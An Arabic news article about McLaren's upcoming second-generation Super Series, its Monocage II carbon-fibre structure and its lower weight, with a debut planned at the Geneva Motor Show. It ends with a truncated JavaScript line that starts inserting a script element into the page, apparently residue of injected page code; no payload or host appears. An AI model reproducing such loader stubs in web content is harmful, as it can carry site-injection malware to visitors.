ماكلارين تستعد للكشف عن الجيل الثاني من فئة السوبر

تستعد ماكلارين أوتوموتيف لبداية مرحلة جديدة في تاريخها خلال شهر مارس، وذلك مع إطلاق الجيل الثاني من فئة السوبر خلال الدورة 87 لمعرض جنيف الدولي للسيارات. ويعد الطراز الجديد أول سيارة من بين 15 سيارة تستعد الشركة لإطلاقها.

وتتركز مواصفات فئة السوبر الجديدة على خفة الوزن العالية والبنية الأساسية القائمة على ألياف الكربون. ورغم التركيز على خفة الوزن، فإن الفئة الجديدة ستتمتع بقدر أكبر من الصلابة مقارنة بالبنية التي استخدمت في الجيل الأول والتي اعتمدت على هيكل من ألياف الكربون ومقصورة معدنية، وسيساهم استخدام القفص الأحادي 2 (Monocage II)في خفض الوزن الجاف إلى 1283 كلغ في السيارة الجديدة، وهو أقل من وزن أقرب طراز منافس، كما يقل عن طراز ماكلارين 650 إس ذي المواصفات المماثلة بمقدار 18كلغ.

وكان تطوير القفص الأحادي (Monocage II) قد ساهم في تمكين ماكلارين من تصميم مدخل مقصورة أعرض وعتبة دخول أكثر انخفاضًا، لتسهيل دخول السائق وتوفير رؤية محيطية أفضل. كما أن بنية هيكل الجديد تساهم في ضمان مركز جاذبية أكثر انخفاضًا، وتحسين الأداء الديناميكي في فئة السوبر الجديدة. ويمكن لمالكي السيارات الراغبين بعرض بنية الهيكل المصنوع من ألياف الكربون تحديد خيار “قفص أحادي مرئي”، والذي يكشف عن المواد داخل عمود الارتكاز الأمامي A-pillar.

سيتم الإعلان عن مزيد من التفاصيل عن الجيل الثاني والجديد من فئة السوبر خلال شهر مارس، مع توفير الصور والأسعار أيضًا.

 

var d=document;var s=d.createElement(‘script’);